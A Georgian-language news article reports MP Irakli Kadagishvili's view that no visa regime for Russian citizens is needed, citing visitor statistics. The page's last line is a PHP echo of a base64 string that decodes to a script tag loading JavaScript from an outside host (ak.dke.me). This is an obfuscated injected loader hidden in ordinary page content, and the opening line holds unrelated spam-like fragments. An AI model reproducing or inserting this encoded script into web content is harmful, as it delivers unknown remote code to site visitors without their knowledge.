celsiusi
ავერსი შნაიდერი
რუსეთის ფედერაციასთან სავიზო რეჟიმის შემოღების აუცილებელი წინაპირობა არ არსებობს - შემოღება ადგილია და რაღაც პერიოდის შემდეგ, გაუქმება უფრო რთული, - ამის შესახებ „ქართული ოცნების“ დეპუტატმა ირაკლი ქადაგიშვილმა განაცხადა.
 
ქადაგიშვილის ინფორმაციით, დღესდღეობით არსებული ოფიციალური სტატისტიკით, რუსეთის ფედერაციიდან ვიზიტორთა რაოდენობა გაზრდილი და 2019-2020 წლების მაჩვენებელზე მაღალი არ არის.
 
ამასთან, ქადაგიშვილის თქმით, შესაბამისი სახელმწიფო ინსტიტუტები მოსალოდნელი საფრთხეების თავიდან აცილებაზე მუდმივად მუშაობენ, „ხოლო წინასწარ იმის თქმა, რომ საქართველოში რაღაც ცუდი აუცილებლად უნდა მოხდეს, სწორი არ არის“.
 
„გასაჯაროებულია ციფრები და ანალოგიური პერიოდის მონაცემები. ჩვენ ვხედავთ, რომ რუსეთის ფედერაციიდან იმაზე ნაკლები ვიზიტორია შემოსული, ვიდრე შემოდიოდნენ წინა წლებში, როცა პანდემიასთან დაკავშირებული შეზღუდვები არ არსებობდა. გამომდინარე აქედან, სავიზო რეჟიმის ამოქმედების პირდაპირი აუცილებლობა არ არის.
 
რა თქმა უნდა, შესაბამისი სახელმწიფო სამსახურები მუდმივ რეჟიმში მუშაობენ, რომ საქართველოს უსაფრთხოება სხვადასხვა საფრთხეებისგან დაცული იყოს, მათ შორის ისეთი საფრთხეებისგან, რაც რუსეთის ფედერაციის ზოგიერთი მოქალაქისგან შეიძლება მომდინარეობდეს“, - განაცხადა ირაკლი ქადაგიშვილმა.
 
ინფორმაციისთვის, საქართველოს ვიცე-პრემიერის, ლევან დავითაშვილის ინფორმაციით, საქართველოში ბოლო პერიოდში რუსეთიდან 20-25 ათასი მოქალაქე შემოვიდა. არსებული ცნობით, რუსეთის მოქალაქეები საკუთარ ქვეყანას, დასავლეთის მკაცრი სანქციების გამო მასობრივად ტოვებენ.
814
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");